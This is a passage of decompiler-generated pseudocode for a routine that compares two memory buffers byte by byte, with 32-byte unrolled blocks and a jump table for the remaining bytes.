																_t955 = _t1263 > 0;
																__eflags = _t955;
																_t1263 = (0 | _t955) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 == 0) {
																_t1263 = (_t1338[1] & 0x000000ff) - (_t1352[1] & 0x000000ff);
																__eflags = _t1263;
																if(_t1263 != 0) {
																	__eflags = _t1263;
																	_t961 = _t1263 > 0;
																	__eflags = _t961;
																	_t1263 = (0 | _t961) * 2 - 1;
																}
																__eflags = _t1263;
																if(_t1263 == 0) {
																	_t1263 = (_t1338[2] & 0x000000ff) - (_t1352[2] & 0x000000ff);
																	__eflags = _t1263;
																	if(_t1263 != 0) {
																		__eflags = _t1263;
																		_t967 = _t1263 > 0;
																		__eflags = _t967;
																		_t1263 = (0 | _t967) * 2 - 1;
																	}
																	__eflags = _t1263;
																	if(_t1263 == 0) {
																		_t1262 = _t1338[3] & 0x000000ff;
																		_t1025 = _t1352[3] & 0x000000ff;
																		L511:
																		_t1263 = _t1262 - _t1025;
																		__eflags = _t1263;
																		if(_t1263 != 0) {
																			__eflags = _t1263;
																			_t973 = _t1263 > 0;
																			__eflags = _t973;
																			_t1263 = (0 | _t973) * 2 - 1;
																		}
																	}
																}
															}
															L513:
															_t1021 = _t1263;
														} else {
															_t1339 = _a4;
															_t1353 = _v0;
															_push(_t1250);
															_t1252 = 0x20;
															while(1) {
																__eflags = _t1344 - _t1252;
																if(_t1344 < _t1252) {
																	break;
																}
																_t1049 =  *_t1353;
																__eflags = _t1049 -  *_t1339;
																if(_t1049 ==  *_t1339) {
																	L42:
																	__eflags = _t1353[4] - _t1339[4];
																	if(_t1353[4] == _t1339[4]) {
																		L55:
																		__eflags = _t1353[8] - _t1339[8];
																		if(_t1353[8] == _t1339[8]) {
																			L68:
																			_t1052 = _t1353[0xc];
																			__eflags = _t1052 - _t1339[0xc];
																			if(_t1052 == _t1339[0xc]) {
																				L81:
																				_t1053 = _t1353[0x10];
																				__eflags = _t1053 - _t1339[0x10];
																				if(_t1053 == _t1339[0x10]) {
																					L94:
																					_t1054 = _t1353[0x14];
																					__eflags = _t1054 - _t1339[0x14];
																					if(_t1054 == _t1339[0x14]) {
																						L107:
																						_t1055 = _t1353[0x18];
																						__eflags = _t1055 - _t1339[0x18];
																						if(_t1055 == _t1339[0x18]) {
																							L120:
																							_t1056 = _t1353[0x1c];
																							__eflags = _t1056 - _t1339[0x1c];
																							if(_t1056 == _t1339[0x1c]) {
																								L133:
																								_t1353 =  &(_t1353[_t1252]);
																								_t1339 =  &(_t1339[_t1252]);
																								_t1344 = _t1344 - _t1252;
																								__eflags = _t1344;
																								continue;
																							} else {
																								_t1270 = (_t1056 & 0x000000ff) - (_t1339[0x1c] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t228 = _t1270 > 0;
																									__eflags = _t228;
																									_t1270 = (0 | _t228) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1d] & 0x000000ff) - (_t1339[0x1d] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t234 = _t1270 > 0;
																										__eflags = _t234;
																										_t1270 = (0 | _t234) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1e] & 0x000000ff) - (_t1339[0x1e] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t240 = _t1270 > 0;
																											__eflags = _t240;
																											_t1270 = (0 | _t240) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											_t1270 = (_t1353[0x1f] & 0x000000ff) - (_t1339[0x1f] & 0x000000ff);
																											__eflags = _t1270;
																											if(_t1270 != 0) {
																												__eflags = _t1270;
																												_t246 = _t1270 > 0;
																												__eflags = _t246;
																												_t1270 = (0 | _t246) * 2 - 1;
																											}
																											__eflags = _t1270;
																											if(_t1270 == 0) {
																												goto L133;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t1270 = (_t1055 & 0x000000ff) - (_t1339[0x18] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t203 = _t1270 > 0;
																								__eflags = _t203;
																								_t1270 = (0 | _t203) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x19] & 0x000000ff) - (_t1339[0x19] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t209 = _t1270 > 0;
																									__eflags = _t209;
																									_t1270 = (0 | _t209) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1a] & 0x000000ff) - (_t1339[0x1a] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t215 = _t1270 > 0;
																										__eflags = _t215;
																										_t1270 = (0 | _t215) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1b] & 0x000000ff) - (_t1339[0x1b] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t221 = _t1270 > 0;
																											__eflags = _t221;
																											_t1270 = (0 | _t221) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											goto L120;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t1270 = (_t1054 & 0x000000ff) - (_t1339[0x14] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t178 = _t1270 > 0;
																							__eflags = _t178;
																							_t1270 = (0 | _t178) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x15] & 0x000000ff) - (_t1339[0x15] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t184 = _t1270 > 0;
																								__eflags = _t184;
																								_t1270 = (0 | _t184) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x16] & 0x000000ff) - (_t1339[0x16] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t190 = _t1270 > 0;
																									__eflags = _t190;
																									_t1270 = (0 | _t190) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x17] & 0x000000ff) - (_t1339[0x17] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t196 = _t1270 > 0;
																										__eflags = _t196;
																										_t1270 = (0 | _t196) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										goto L107;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t1270 = (_t1053 & 0x000000ff) - (_t1339[0x10] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t153 = _t1270 > 0;
																						__eflags = _t153;
																						_t1270 = (0 | _t153) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0x11] & 0x000000ff) - (_t1339[0x11] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t159 = _t1270 > 0;
																							__eflags = _t159;
																							_t1270 = (0 | _t159) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x12] & 0x000000ff) - (_t1339[0x12] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t165 = _t1270 > 0;
																								__eflags = _t165;
																								_t1270 = (0 | _t165) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x13] & 0x000000ff) - (_t1339[0x13] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t171 = _t1270 > 0;
																									__eflags = _t171;
																									_t1270 = (0 | _t171) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									goto L94;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				_t1270 = (_t1052 & 0x000000ff) - (_t1339[0xc] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t128 = _t1270 > 0;
																					__eflags = _t128;
																					_t1270 = (0 | _t128) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xd] & 0x000000ff) - (_t1339[0xd] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t134 = _t1270 > 0;
																						__eflags = _t134;
																						_t1270 = (0 | _t134) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xe] & 0x000000ff) - (_t1339[0xe] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t140 = _t1270 > 0;
																							__eflags = _t140;
																							_t1270 = (0 | _t140) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0xf] & 0x000000ff) - (_t1339[0xf] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t146 = _t1270 > 0;
																								__eflags = _t146;
																								_t1270 = (0 | _t146) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								goto L81;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t1270 = (_t1353[8] & 0x000000ff) - (_t1339[8] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t103 = _t1270 > 0;
																				__eflags = _t103;
																				_t1270 = (0 | _t103) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[9] & 0x000000ff) - (_t1339[9] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t109 = _t1270 > 0;
																					__eflags = _t109;
																					_t1270 = (0 | _t109) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xa] & 0x000000ff) - (_t1339[0xa] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t115 = _t1270 > 0;
																						__eflags = _t115;
																						_t1270 = (0 | _t115) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xb] & 0x000000ff) - (_t1339[0xb] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t121 = _t1270 > 0;
																							__eflags = _t121;
																							_t1270 = (0 | _t121) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							goto L68;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t1270 = (_t1353[4] & 0x000000ff) - (_t1339[4] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t77 = _t1270 > 0;
																			__eflags = _t77;
																			_t1270 = (0 | _t77) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[5] & 0x000000ff) - (_t1339[5] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t83 = _t1270 > 0;
																				__eflags = _t83;
																				_t1270 = (0 | _t83) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[6] & 0x000000ff) - (_t1339[6] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t89 = _t1270 > 0;
																					__eflags = _t89;
																					_t1270 = (0 | _t89) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[7] & 0x000000ff) - (_t1339[7] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t95 = _t1270 > 0;
																						__eflags = _t95;
																						_t1270 = (0 | _t95) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L55;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t1270 = (_t1049 & 0x000000ff) - ( *_t1339 & 0x000000ff);
																	__eflags = _t1270;
																	if(_t1270 != 0) {
																		__eflags = _t1270;
																		_t51 = _t1270 > 0;
																		__eflags = _t51;
																		_t1270 = (0 | _t51) * 2 - 1;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		_t1270 = (_t1353[1] & 0x000000ff) - (_t1339[1] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t57 = _t1270 > 0;
																			__eflags = _t57;
																			_t1270 = (0 | _t57) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[2] & 0x000000ff) - (_t1339[2] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t63 = _t1270 > 0;
																				__eflags = _t63;
																				_t1270 = (0 | _t63) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[3] & 0x000000ff) - (_t1339[3] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t69 = _t1270 > 0;
																					__eflags = _t69;
																					_t1270 = (0 | _t69) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					goto L42;
																				}
																			}
																		}
																	}
																}
																L228:
																_t1021 = _t1270;
																goto L527;
															}
															_t1354 =  &(_t1353[_t1344]);
															_t1340 =  &(_t1339[_t1344]);
															switch( *((intOrPtr*)(_t1344 * 4 +  &M001AF62A))) {
																case 0:
																	L227:
																	_t1270 = 0;
																	__eflags = 0;
																	goto L228;
																case 1:
																	L320:
																	__eax =  *(__edx - 1) & 0x000000ff;
																	__ecx =  *(__esi - 1) & 0x000000ff;
																	__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		__eax = 0 | __ecx > 0x00000000;
																		__ecx = (__ecx > 0) * 2 - 1;
																	}
																	goto L228;
																case 2:
																	L413:
																	__eflags =  *(__esi - 2) -  *(__edx - 2);
																	if( *(__esi - 2) ==  *(__edx - 2)) {
																		goto L227;
																	} else {
																		goto L317;
																	}
																	goto L528;
																case 3:
																	L314:
																	__eax =  *(__edx - 3) & 0x000000ff;
																	__ecx =  *(__esi - 3) & 0x000000ff;
																	__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		_t594 = __ecx > 0;
																		__eflags = _t594;
																		__eax = 0 | _t594;
																		__ecx = _t594 * 2 - 1;
																	}
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		goto L228;
																	} else {
																		L317:
																		__eax =  *(__edx - 2) & 0x000000ff;
																		__ecx =  *(__esi - 2) & 0x000000ff;
																		__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t600 = __ecx > 0;
																			__eflags = _t600;
																			__eax = 0 | _t600;
																			__ecx = _t600 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			goto L320;
																		}
																	}
																	goto L528;
																case 4:
																	L214:
																	_t1063 =  *(_t1354 - 4);
																	__eflags = _t1063 -  *(_t1340 - 4);
																	if(_t1063 ==  *(_t1340 - 4)) {
																		goto L227;
																	} else {
																		_t1270 = (_t1063 & 0x000000ff) - ( *(_t1340 - 4) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t405 = _t1270 > 0;
																			__eflags = _t405;
																			_t1270 = (0 | _t405) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 3) & 0x000000ff) - ( *(_t1340 - 3) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t411 = _t1270 > 0;
																				__eflags = _t411;
																				_t1270 = (0 | _t411) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 2) & 0x000000ff) - ( *(_t1340 - 2) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t417 = _t1270 > 0;
																					__eflags = _t417;
																					_t1270 = (0 | _t417) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 1) & 0x000000ff) - ( *(_t1340 - 1) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t423 = _t1270 > 0;
																						__eflags = _t423;
																						_t1270 = (0 | _t423) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L227;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 5:
																	L307:
																	__eax =  *(__esi - 5);
																	__eflags =  *(__esi - 5) -  *(__edx - 5);
																	if( *(__esi - 5) ==  *(__edx - 5)) {
																		goto L320;
																	} else {
																		goto L308;
																	}
																	goto L528;
																case 6:
																	L400:
																	__eax =  *(__esi - 6);
																	__eflags =  *(__esi - 6) -  *(__edx - 6);
																	if( *(__esi - 6) ==  *(__edx - 6)) {
																		goto L413;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 6) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t764 = __ecx > 0;
																			__eflags = _t764;
																			__eax = 0 | _t764;
																			__ecx = _t764 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 5) & 0x000000ff;
																			__eax =  *(__edx - 5) & 0x000000ff;
																			__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t770 = __ecx > 0;
																				__eflags = _t770;
																				__eax = 0 | _t770;
																				__ecx = _t770 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 4) & 0x000000ff;
																				__eax =  *(__edx - 4) & 0x000000ff;
																				__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t776 = __ecx > 0;
																					__eflags = _t776;
																					__eax = 0 | _t776;
																					__ecx = _t776 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 3) & 0x000000ff;
																					__eax =  *(__edx - 3) & 0x000000ff;
																					__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t782 = __ecx > 0;
																						__eflags = _t782;
																						__eax = 0 | _t782;
																						__ecx = _t782 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L413;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 7:
																	L493:
																	__eax =  *(__esi - 7);
																	__eflags =  *(__esi - 7) -  *(__edx - 7);
																	if( *(__esi - 7) ==  *(__edx - 7)) {
																		goto L314;
																	} else {
																		__eax =  *(__edx - 7) & 0x000000ff;
																		__ecx =  *(__esi - 7) & 0x000000ff;
																		__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t943 = __ecx > 0;
																			__eflags = _t943;
																			__eax = 0 | _t943;
																			__ecx = _t943 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 6) & 0x000000ff;
																			__eax =  *(__edx - 6) & 0x000000ff;
																			__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t949 = __ecx > 0;
																				__eflags = _t949;
																				__eax = 0 | _t949;
																				__ecx = _t949 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				L308:
																				__eax =  *(__edx - 5) & 0x000000ff;
																				__ecx =  *(__esi - 5) & 0x000000ff;
																				__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t582 = __ecx > 0;
																					__eflags = _t582;
																					__eax = 0 | _t582;
																					__ecx = _t582 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__eax =  *(__edx - 4) & 0x000000ff;
																					__ecx =  *(__esi - 4) & 0x000000ff;
																					__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t588 = __ecx > 0;
																						__eflags = _t588;
																						__eax = 0 | _t588;
																						__ecx = _t588 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L314;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 8:
																	L201:
																	_t1062 =  *(_t1354 - 8);
																	__eflags = _t1062 -  *(_t1340 - 8);
																	if(_t1062 ==  *(_t1340 - 8)) {
																		goto L214;
																	} else {
																		_t1270 = (_t1062 & 0x000000ff) - ( *(_t1340 - 8) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t380 = _t1270 > 0;
																			__eflags = _t380;
																			_t1270 = (0 | _t380) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 7) & 0x000000ff) - ( *(_t1340 - 7) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t386 = _t1270 > 0;
																				__eflags = _t386;
																				_t1270 = (0 | _t386) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 6) & 0x000000ff) - ( *(_t1340 - 6) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t392 = _t1270 > 0;
																					__eflags = _t392;
																					_t1270 = (0 | _t392) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 5) & 0x000000ff) - ( *(_t1340 - 5) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t398 = _t1270 > 0;
																						__eflags = _t398;
																						_t1270 = (0 | _t398) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L214;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 9:
																	L294:
																	__eax =  *(__esi - 9);
																	__eflags =  *(__esi - 9) -  *(__edx - 9);
																	if( *(__esi - 9) ==  *(__edx - 9)) {
																		goto L307;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 9) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t556 = __ecx > 0;
																			__eflags = _t556;
																			__eax = 0 | _t556;
																			__ecx = _t556 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 8) & 0x000000ff;
																			__eax =  *(__edx - 8) & 0x000000ff;
																			__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t562 = __ecx > 0;
																				__eflags = _t562;
																				__eax = 0 | _t562;
																				__ecx = _t562 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 7) & 0x000000ff;
																				__eax =  *(__edx - 7) & 0x000000ff;
																				__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t568 = __ecx > 0;
																					__eflags = _t568;
																					__eax = 0 | _t568;
																					__ecx = _t568 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 6) & 0x000000ff;
																					__eax =  *(__edx - 6) & 0x000000ff;
																					__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t574 = __ecx > 0;
																						__eflags = _t574;
																						__eax = 0 | _t574;
																						__ecx = _t574 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L307;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xa:
																	L387:
																	__eax =  *(__esi - 0xa);
																	__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
																	if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
																		goto L400;
																	} else {
																		__eax =  *(__edx - 0xa) & 0x000000ff;
																		__ecx =  *(__esi - 0xa) & 0x000000ff;
																		__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t739 = __ecx > 0;
																			__eflags = _t739;
																			__eax = 0 | _t739;
																			__ecx = _t739 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 9) & 0x000000ff;
																			__eax =  *(__edx - 9) & 0x000000ff;
																			__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t745 = __ecx > 0;
																				__eflags = _t745;
																				__eax = 0 | _t745;
																				__ecx = _t745 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 8) & 0x000000ff;
																				__eax =  *(__edx - 8) & 0x000000ff;
																				__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t751 = __ecx > 0;
																					__eflags = _t751;
																					__eax = 0 | _t751;
																					__ecx = _t751 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 7) & 0x000000ff;
																					__eax =  *(__edx - 7) & 0x000000ff;
																					__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t757 = __ecx > 0;
																						__eflags = _t757;
																						__eax = 0 | _t757;
																						__ecx = _t757 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L400;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xb:
																	L480:
																	__eax =  *(__esi - 0xb);
																	__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
																	if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
																		goto L493;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xb) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t917 = __ecx > 0;
																			__eflags = _t917;
																			__eax = 0 | _t917;
